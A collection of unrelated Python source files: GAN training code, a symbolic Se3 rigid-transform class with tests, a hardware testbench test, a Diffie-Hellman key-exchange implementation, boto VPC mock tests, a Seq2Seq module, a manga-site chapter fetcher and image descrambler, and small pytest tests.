noise_input = Variable(noise_input)
batch_sample_idx = Variable(batch_sample_idx)
fake_diff_mask = Variable(fake_diff_mask)
fake_mask = Variable(fake_mask)
opt_ans_input = Variable(opt_ans_input)
opt_ans_target = Variable(opt_ans_target)
gt_index = Variable(gt_index)
optimizerD = optim.Adam([{'params': netW_d.parameters()},
{'params': netE_d.parameters()},
{'params': netD.parameters()}], lr=opt.D_lr, betas=(opt.beta1, 0.999))
optimizerG = optim.Adam([{'params': netW_g.parameters()},
{'params': netE_g.parameters()},
{'params': netG.parameters()}], lr=opt.G_lr, betas=(opt.beta1, 0.999))
optimizerLM = optim.Adam([{'params': netW_g.parameters()},
{'params': netE_g.parameters()},
{'params': netG.parameters()}], lr=opt.LM_lr, betas=(opt.beta1, 0.999))
history = []
train_his = {}
epoch = 0
print('Evaluating ... ')
rank_G, rank_D = val()
R1 = np.sum(np.array(rank_G)==1) / float(len(rank_G))
R5 = np.sum(np.array(rank_G)<=5) / float(len(rank_G))
R10 = np.sum(np.array(rank_G)<=10) / float(len(rank_G))
ave = np.sum(np.array(rank_G)) / float(len(rank_G))
mrr = np.sum(1/(np.array(rank_G, dtype='float'))) / float(len(rank_G))
print ('Generator: %d/%d: mrr: %f R1: %f R5 %f R10 %f Mean %f' %(epoch, len(dataloader_val), mrr, R1, R5, R10, ave))
R1 = np.sum(np.array(rank_D)==1) / float(len(rank_D))
R5 = np.sum(np.array(rank_D)<=5) / float(len(rank_D))
R10 = np.sum(np.array(rank_D)<=10) / float(len(rank_D))
ave = np.sum(np.array(rank_D)) / float(len(rank_D))
mrr = np.sum(1/(np.array(rank_D, dtype='float'))) / float(len(rank_D))
print ('Discriminator: %d/%d: mrr: %f R1: %f R5 %f R10 %f Mean %f' %(epoch, len(dataloader_val), mrr, R1, R5, R10, ave))
|
11521726
|
import sympy
import sys
import unittest
import sophus
import functools
class Se3:
""" 3 dimensional group of rigid body transformations """
def __init__(self, so3, t):
""" internally represented by a unit quaternion q and a translation
3-vector """
assert isinstance(so3, sophus.So3)
assert isinstance(t, sympy.Matrix)
assert t.shape == (3, 1), t.shape
self.so3 = so3
self.t = t
@staticmethod
def exp(v):
""" exponential map """
upsilon = v[0:3, :]
omega = sophus.Vector3(v[3], v[4], v[5])
so3 = sophus.So3.exp(omega)
Omega = sophus.So3.hat(omega)
Omega_sq = Omega * Omega
theta = sympy.sqrt(sophus.squared_norm(omega))
V = (sympy.Matrix.eye(3) +
(1 - sympy.cos(theta)) / (theta**2) * Omega +
(theta - sympy.sin(theta)) / (theta**3) * Omega_sq)
return Se3(so3, V * upsilon)
def log(self):
omega = self.so3.log()
theta = sympy.sqrt(sophus.squared_norm(omega))
Omega = sophus.So3.hat(omega)
half_theta = 0.5 * theta
V_inv = sympy.Matrix.eye(3) - 0.5 * Omega + (1 - theta * sympy.cos(
half_theta) / (2 * sympy.sin(half_theta))) / (theta * theta) *\
(Omega * Omega)
upsilon = V_inv * self.t
return upsilon.col_join(omega)
def __repr__(self):
return "Se3: [" + repr(self.so3) + " " + repr(self.t)
def inverse(self):
invR = self.so3.inverse()
return Se3(invR, invR * (-1 * self.t))
@staticmethod
def hat(v):
""" R^6 => R^4x4 """
""" returns 4x4-matrix representation ``Omega`` """
upsilon = sophus.Vector3(v[0], v[1], v[2])
omega = sophus.Vector3(v[3], v[4], v[5])
return sophus.So3.hat(omega).\
row_join(upsilon).\
col_join(sympy.Matrix.zeros(1, 4))
@staticmethod
def vee(Omega):
""" R^4x4 => R^6 """
""" returns 6-vector representation of Lie algebra """
""" This is the inverse of the hat-operator """
head = sophus.Vector3(Omega[0,3], Omega[1,3], Omega[2,3])
tail = sophus.So3.vee(Omega[0:3,0:3])
upsilon_omega = \
sophus.Vector6(head[0], head[1], head[2], tail[0], tail[1], tail[2])
return upsilon_omega
def matrix(self):
""" returns matrix representation """
R = self.so3.matrix()
return (R.row_join(self.t)).col_join(sympy.Matrix(1, 4, [0, 0, 0, 1]))
def __mul__(self, right):
""" left-multiplication
either rotation concatenation or point-transform """
if isinstance(right, sympy.Matrix):
assert right.shape == (3, 1), right.shape
return self.so3 * right + self.t
elif isinstance(right, Se3):
r = self.so3 * right.so3
t = self.t + self.so3 * right.t
return Se3(r, t)
assert False, "unsupported type: {0}".format(type(right))
def __getitem__(self, key):
""" We use the following convention [q0, q1, q2, q3, t0, t1, t2] """
assert (key >= 0 and key < 7)
if key < 4:
return self.so3[key]
else:
return self.t[key - 4]
@staticmethod
def calc_Dx_exp_x(x):
return sympy.Matrix(7, 6, lambda r, c:
sympy.diff(Se3.exp(x)[r], x[c]))
@staticmethod
def Dx_exp_x_at_0():
return sympy.Matrix([[0.0, 0.0, 0.0, 0.5, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.5, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.5],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0, 0.0]])
def calc_Dx_this_mul_exp_x_at_0(self, x):
v = Se3.exp(x)
return sympy.Matrix(7, 6, lambda r, c:
sympy.diff((self * Se3.exp(x))[r], x[c])). \
subs(x[0], 0).subs(x[1], 0).subs(x[2], 0).\
subs(x[3], 0).subs(x[4], 0).limit(x[5], 0)
@staticmethod
def calc_Dx_exp_x_at_0(x):
return Se3.calc_Dx_exp_x(x).subs(x[0], 0).subs(x[1], 0).subs(x[2], 0).\
subs(x[3], 0).subs(x[4], 0).limit(x[5], 0)
@staticmethod
def Dxi_x_matrix(x, i):
if i < 4:
return sophus.So3.Dxi_x_matrix(x, i).\
row_join(sympy.Matrix.zeros(3, 1)).\
col_join(sympy.Matrix.zeros(1, 4))
M = sympy.Matrix.zeros(4, 4)
M[i - 4, 3] = 1
return M
@staticmethod
def calc_Dxi_x_matrix(x, i):
return sympy.Matrix(4, 4, lambda r, c:
sympy.diff(x.matrix()[r, c], x[i]))
@staticmethod
def Dxi_exp_x_matrix(x, i):
T = Se3.exp(x)
Dx_exp_x = Se3.calc_Dx_exp_x(x)
l = [Dx_exp_x[j, i] * Se3.Dxi_x_matrix(T, j) for j in range(0, 7)]
return functools.reduce((lambda a, b: a + b), l)
@staticmethod
def calc_Dxi_exp_x_matrix(x, i):
return sympy.Matrix(4, 4, lambda r, c:
sympy.diff(Se3.exp(x).matrix()[r, c], x[i]))
@staticmethod
def Dxi_exp_x_matrix_at_0(i):
v = sophus.ZeroVector6()
v[i] = 1
return Se3.hat(v)
@staticmethod
def calc_Dxi_exp_x_matrix_at_0(x, i):
return sympy.Matrix(4, 4, lambda r, c:
sympy.diff(Se3.exp(x).matrix()[r, c], x[i])
).subs(x[0], 0).subs(x[1], 0).subs(x[2], 0).\
subs(x[3], 0).subs(x[4], 0).limit(x[5], 0)
class TestSe3(unittest.TestCase):
def setUp(self):
upsilon0, upsilon1, upsilon2, omega0, omega1, omega2 = sympy.symbols(
'upsilon[0], upsilon[1], upsilon[2], omega[0], omega[1], omega[2]',
real=True)
x, v0, v1, v2 = sympy.symbols('q.w() q.x() q.y() q.z()', real=True)
p0, p1, p2 = sympy.symbols('p0 p1 p2', real=True)
t0, t1, t2 = sympy.symbols('t[0] t[1] t[2]', real=True)
v = sophus.Vector3(v0, v1, v2)
self.upsilon_omega = sophus.Vector6(
upsilon0, upsilon1, upsilon2, omega0, omega1, omega2)
self.t = sophus.Vector3(t0, t1, t2)
self.a = Se3(sophus.So3(sophus.Quaternion(x, v)), self.t)
self.p = sophus.Vector3(p0, p1, p2)
def test_exp_log(self):
for v in [sophus.Vector6(0., 1, 0.5, 2., 1, 0.5),
sophus.Vector6(0.1, 0.1, 0.1, 0., 1, 0.5),
sophus.Vector6(0.01, 0.2, 0.03, 0.01, 0.2, 0.03)]:
w = Se3.exp(v).log()
for i in range(0, 3):
self.assertAlmostEqual(v[i], w[i])
def test_matrix(self):
T_foo_bar = Se3.exp(self.upsilon_omega)
Tmat_foo_bar = T_foo_bar.matrix()
point_bar = self.p
p1_foo = T_foo_bar * point_bar
p2_foo = sophus.proj(Tmat_foo_bar * sophus.unproj(point_bar))
self.assertEqual(sympy.simplify(p1_foo - p2_foo),
sophus.ZeroVector3())
def test_derivatives(self):
self.assertEqual(sympy.simplify(
Se3.calc_Dx_exp_x_at_0(self.upsilon_omega) -
Se3.Dx_exp_x_at_0()),
sympy.Matrix.zeros(7, 6))
for i in range(0, 7):
self.assertEqual(sympy.simplify(Se3.calc_Dxi_x_matrix(self.a, i) -
Se3.Dxi_x_matrix(self.a, i)),
sympy.Matrix.zeros(4, 4))
for i in range(0, 6):
self.assertEqual(sympy.simplify(
Se3.Dxi_exp_x_matrix(self.upsilon_omega, i) -
Se3.calc_Dxi_exp_x_matrix(self.upsilon_omega, i)),
sympy.Matrix.zeros(4, 4))
self.assertEqual(sympy.simplify(
Se3.Dxi_exp_x_matrix_at_0(i) -
Se3.calc_Dxi_exp_x_matrix_at_0(self.upsilon_omega, i)),
sympy.Matrix.zeros(4, 4))
def test_codegen(self):
stream = sophus.cse_codegen(self.a.calc_Dx_exp_x(self.upsilon_omega))
filename = "cpp_gencode/Se3_Dx_exp_x.cpp"
# set to true to generate codegen files
if False:
file = open(filename, "w")
for line in stream:
file.write(line)
file.close()
else:
file = open(filename, "r")
file_lines = file.readlines()
for i, line in enumerate(stream):
self.assertEqual(line, file_lines[i])
file.close()
stream.close
stream = sophus.cse_codegen(self.a.calc_Dx_this_mul_exp_x_at_0(
self.upsilon_omega))
filename = "cpp_gencode/Se3_Dx_this_mul_exp_x_at_0.cpp"
# set to true to generate codegen files
if False:
file = open(filename, "w")
for line in stream:
file.write(line)
file.close()
else:
file = open(filename, "r")
file_lines = file.readlines()
for i, line in enumerate(stream):
self.assertEqual(line, file_lines[i])
file.close()
stream.close
if __name__ == '__main__':
unittest.main()
|
11521750
|
from kratos import Generator, TestBench, initial, assert_, delay, Sequence
def tb_dut_setup():
dut = Generator("mod")
dut.wire(dut.output("out", 1), dut.input("in", 1))
dut.wire(dut.var("val", 1), dut.ports["in"])
tb = TestBench()
tb.add_child("dut", dut)
in_ = tb.var("in", 1)
out_ = tb.var("out", 1)
tb.wire(dut.ports["in"], in_)
tb.wire(out_, dut.ports["out"])
return dut, tb
def test_tb_codegen(check_gold):
dut, tb = tb_dut_setup()
@initial
def code():
tb.vars["in"] = 1
assert_(tb.vars.out == 1)
# access internal signal
assert_(dut.vars.val == 1)
tb.add_always(code)
src = tb.codegen()
check_gold(src, "test_tb_codegen")
def test_tb_delay(check_gold):
dut, tb = tb_dut_setup()
@initial
def code():
delay(1, tb.vars["in"].assign(1))
tb.add_always(code)
src = tb.codegen()
check_gold(src, "test_tb_delay")
def test_tb_sequence(check_gold):
from kratos.util import clock
from kratos import PropertyAction
dut, tb = tb_dut_setup()
# add a clock and wire them together
tb.wire(dut.clock("clk"), clock(tb.var("clk", 1)))
seq = Sequence(tb.vars["in"] == 1)
seq.imply(tb.vars.out == 1).wait(1).imply(tb.vars.out == 0)
p = tb.property("test_out", seq)
p.action = PropertyAction.Assert
src = tb.codegen()
check_gold(src, "test_tb_sequence")
if __name__ == "__main__":
from conftest import check_gold_fn
test_tb_sequence(check_gold_fn)
|
11521771
|
from binascii import hexlify
from hashlib import sha256
from os import urandom
# RFC 3526 - More Modular Exponential (MODP) Diffie-Hellman groups for
# Internet Key Exchange (IKE) https://tools.ietf.org/html/rfc3526
primes = {
# 1536-bit
5: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
+ "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
+ "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
+ "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
+ "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
+ "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
+ "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
# 2048-bit
14: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
+ "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
+ "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
+ "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
+ "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
+ "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
+ "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
+ "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
+ "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
+ "15728E5A8AACAA68FFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
# 3072-bit
15: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
+ "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
+ "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
+ "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
+ "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
+ "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
+ "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
+ "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
+ "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
+ "15728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64"
+ "ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7"
+ "ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6B"
+ "F12FFA06D98A0864D87602733EC86A64521F2B18177B200C"
+ "BBE117577A615D6C770988C0BAD946E208E24FA074E5AB31"
+ "43DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
# 4096-bit
16: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
+ "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
+ "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
+ "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
+ "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
+ "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
+ "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
+ "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
+ "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
+ "15728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64"
+ "ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7"
+ "ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6B"
+ "F12FFA06D98A0864D87602733EC86A64521F2B18177B200C"
+ "BBE117577A615D6C770988C0BAD946E208E24FA074E5AB31"
+ "43DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D7"
+ "88719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA"
+ "2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6"
+ "287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED"
+ "1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA9"
+ "93B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199"
+ "FFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
# 6144-bit
17: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E08"
+ "8A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B"
+ "302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9"
+ "A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE6"
+ "49286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8"
+ "FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C"
+ "180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718"
+ "3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D"
+ "04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7D"
+ "B3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D226"
+ "1AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200C"
+ "BBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFC"
+ "E0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B26"
+ "99C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB"
+ "04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2"
+ "233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127"
+ "D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934028492"
+ "36C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406"
+ "AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918"
+ "DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B33205151"
+ "2BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03"
+ "F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97F"
+ "BEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AA"
+ "CC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58B"
+ "B7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632"
+ "387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E"
+ "6DCC4024FFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
# 8192-bit
18: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
+ "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
+ "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
+ "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
+ "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
+ "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
+ "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
+ "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
+ "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
+ "15728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64"
+ "ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7"
+ "ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6B"
+ "F12FFA06D98A0864D87602733EC86A64521F2B18177B200C"
+ "BBE117577A615D6C770988C0BAD946E208E24FA074E5AB31"
+ "43DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D7"
+ "88719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA"
+ "2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6"
+ "287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED"
+ "1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA9"
+ "93B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934028492"
+ "36C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BD"
+ "F8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831"
+ "179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1B"
+ "DB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF"
+ "5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6"
+ "D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F3"
+ "23A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AA"
+ "CC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE328"
+ "06A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55C"
+ "DA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE"
+ "12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E4"
+ "38777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300"
+ "741FA7BF8AFC47ED2576F6936BA424663AAB639C5AE4F568"
+ "3423B4742BF1C978238F16CBE39D652DE3FDB8BEFC848AD9"
+ "22222E04A4037C0713EB57A81A23F0C73473FC646CEA306B"
+ "4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A"
+ "062B3CF5B3A278A66D2A13F83F44F82DDF310EE074AB6A36"
+ "4597E899A0255DC164F31CC50846851DF9AB48195DED7EA1"
+ "B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F92"
+ "4009438B481C6CD7889A002ED5EE382BC9190DA6FC026E47"
+ "9558E4475677E9AA9E3050E2765694DFC81F56E880B96E71"
+ "60C980DD98EDD3DFFFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
}
class DiffieHellman:
"""
Class to represent the Diffie-Hellman key exchange protocol
>>> alice = DiffieHellman()
>>> bob = DiffieHellman()
>>> alice_private = alice.get_private_key()
>>> alice_public = alice.generate_public_key()
>>> bob_private = bob.get_private_key()
>>> bob_public = bob.generate_public_key()
>>> # generating shared key using the DH object
>>> alice_shared = alice.generate_shared_key(bob_public)
>>> bob_shared = bob.generate_shared_key(alice_public)
>>> assert alice_shared == bob_shared
>>> # generating shared key using static methods
>>> alice_shared = DiffieHellman.generate_shared_key_static(
... alice_private, bob_public
... )
>>> bob_shared = DiffieHellman.generate_shared_key_static(
... bob_private, alice_public
... )
>>> assert alice_shared == bob_shared
"""
# Current minimum recommendation is 2048 bit (group 14)
def __init__(self, group: int = 14) -> None:
if group not in primes:
raise ValueError("Unsupported Group")
self.prime = primes[group]["prime"]
self.generator = primes[group]["generator"]
self.__private_key = int(hexlify(urandom(32)), base=16)
def get_private_key(self) -> str:
return hex(self.__private_key)[2:]
def generate_public_key(self) -> str:
public_key = pow(self.generator, self.__private_key, self.prime)
return hex(public_key)[2:]
def is_valid_public_key(self, key: int) -> bool:
# check if the other public key is valid based on NIST SP800-56
if 2 <= key and key <= self.prime - 2:
if pow(key, (self.prime - 1) // 2, self.prime) == 1:
return True
return False
def generate_shared_key(self, other_key_str: str) -> str:
other_key = int(other_key_str, base=16)
if not self.is_valid_public_key(other_key):
raise ValueError("Invalid public key")
shared_key = pow(other_key, self.__private_key, self.prime)
return sha256(str(shared_key).encode()).hexdigest()
@staticmethod
def is_valid_public_key_static(remote_public_key_str: int, prime: int) -> bool:
# check if the other public key is valid based on NIST SP800-56
if 2 <= remote_public_key_str and remote_public_key_str <= prime - 2:
if pow(remote_public_key_str, (prime - 1) // 2, prime) == 1:
return True
return False
@staticmethod
def generate_shared_key_static(
local_private_key_str: str, remote_public_key_str: str, group: int = 14
) -> str:
local_private_key = int(local_private_key_str, base=16)
remote_public_key = int(remote_public_key_str, base=16)
prime = primes[group]["prime"]
if not DiffieHellman.is_valid_public_key_static(remote_public_key, prime):
raise ValueError("Invalid public key")
shared_key = pow(remote_public_key, local_private_key, prime)
return sha256(str(shared_key).encode()).hexdigest()
if __name__ == "__main__":
import doctest
doctest.testmod()
|
11521823
|
from tests.unit import unittest
from tests.unit import AWSMockServiceTestCase
from boto.vpc import VPCConnection, CustomerGateway
class TestDescribeCustomerGateways(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return """
<DescribeCustomerGatewaysResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<customerGatewaySet>
<item>
<customerGatewayId>cgw-b4dc3961</customerGatewayId>
<state>available</state>
<type>ipsec.1</type>
<ipAddress>172.16.58.3</ipAddress>
<bgpAsn>65534</bgpAsn>
<tagSet/>
</item>
</customerGatewaySet>
</DescribeCustomerGatewaysResponse>
"""
def test_get_all_customer_gateways(self):
self.set_http_response(status_code=200)
api_response = self.service_connection.get_all_customer_gateways(
'cgw-b4dc3961',
filters=[('state', ['pending', 'available']),
('ip-address', '172.16.58.3')])
self.assert_request_parameters({
'Action': 'DescribeCustomerGateways',
'CustomerGatewayId.1': 'cgw-b4dc3961',
'Filter.1.Name': 'state',
'Filter.1.Value.1': 'pending',
'Filter.1.Value.2': 'available',
'Filter.2.Name': 'ip-address',
'Filter.2.Value.1': '172.16.58.3'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEquals(len(api_response), 1)
self.assertIsInstance(api_response[0], CustomerGateway)
self.assertEqual(api_response[0].id, 'cgw-b4dc3961')
class TestCreateCustomerGateway(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return """
<CreateCustomerGatewayResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<customerGateway>
<customerGatewayId>cgw-b4dc3961</customerGatewayId>
<state>pending</state>
<type>ipsec.1</type>
<ipAddress>172.16.58.3</ipAddress>
<bgpAsn>65534</bgpAsn>
<tagSet/>
</customerGateway>
</CreateCustomerGatewayResponse>
"""
def test_create_customer_gateway(self):
self.set_http_response(status_code=200)
api_response = self.service_connection.create_customer_gateway(
'ipsec.1', '172.16.58.3', 65534)
self.assert_request_parameters({
'Action': 'CreateCustomerGateway',
'Type': 'ipsec.1',
'IpAddress': '172.16.58.3',
'BgpAsn': 65534},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertIsInstance(api_response, CustomerGateway)
self.assertEquals(api_response.id, 'cgw-b4dc3961')
self.assertEquals(api_response.state, 'pending')
self.assertEquals(api_response.type, 'ipsec.1')
self.assertEquals(api_response.ip_address, '172.16.58.3')
self.assertEquals(api_response.bgp_asn, 65534)
class TestDeleteCustomerGateway(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return """
<DeleteCustomerGatewayResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</DeleteCustomerGatewayResponse>
"""
def test_delete_customer_gateway(self):
self.set_http_response(status_code=200)
api_response = self.service_connection.delete_customer_gateway('cgw-b4dc3961')
self.assert_request_parameters({
'Action': 'DeleteCustomerGateway',
'CustomerGatewayId': 'cgw-b4dc3961'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEquals(api_response, True)
if __name__ == '__main__':
unittest.main()
|
11521830
|
import torch.nn as nn
from .Encoder import Encoder
from .Decoder import Decoder
class Seq2Seq(nn.Module):
def __init__(self, encoder, attention, decoder):
super().__init__()
self.encoder = encoder
self.attn = attention
self.decoder = decoder
def forward(self, x):
# c is the context
encoder_out = self.encoder(x)
att_output = self.attn(encoder_out)
output = self.decoder(att_output)
return output
|
11521850
|
import itertools
import pytest
from examples.my_heart_counts.six_minute_walk_activity import pipeline
@pytest.fixture
def dataframe(scope="module"):
dataframe = pipeline.process()[0]
return dataframe
def test_data_is_correctly_loaded(dataframe):
assert list(dataframe.columns) == ["recordId", "numberOfSteps_max"]
|
11521853
|
from manga_py.crypt import Puzzle
from manga_py.fs import get_temp_path, rename
from manga_py.provider import Provider
class TonariNoYjJp:
provider = None
div_num = 4
multiply = 8
matrix = None
temp_path = None
def __init__(self, provider: Provider):
self.provider = provider
self.temp_path = get_temp_path('__image_matrix{}.png')
matrix = {}
for i in range(self.div_num * self.div_num):
matrix[i] = (i % self.div_num) * self.div_num + int(i / self.div_num)
self.matrix = matrix
def _chapter_api_content(self, idx) -> dict:
api = '{}/api/viewer/readable_products?current_readable_product_id={}&' \
'number_since=99&number_until=-1&read_more_num=100&type=episode'
content = self.provider.http_get(api.format(self.provider.domain, idx))
if content[0] == '{':
return self.provider.json.loads(content)
return {}
def _check_need_next_chapter(self, next_url):
if next_url:
test = self.provider.re.search('number_since=(\d+)', next_url).group(1)
if int(test) > 1:
return True
return False
def get_chapters(self, idx) -> list:
content = self._chapter_api_content(idx)
items = self.provider.document_fromstring(content.get('html', '<html></html>'), '.series-episode-list-thumb')
need_more = self._check_need_next_chapter(content.get('nextUrl', None))
if need_more:
items += self.get_chapters(content.get('nextUrl'))
re = self.provider.re.compile(r'/episode-thumbnail/(\d+)')
return [re.search(i.get('src')).group(1) for i in items]
def solve_image(self, path, idx):
try:
solver = Puzzle(self.div_num, self.div_num, self.matrix, self.multiply)
solver.need_copy_orig = True
_ = self.temp_path.format(idx)
solver.de_scramble(path, _)
rename(_, path)
except Exception:
pass
|
11521880
|
import pytest
from .graphql import assert_query
@pytest.mark.django_db
def test_image(client):
assert_query(client, 'image', '1')
@pytest.mark.django_db
def test_image_with_focal_point(client):
assert_query(client, 'image', '2')
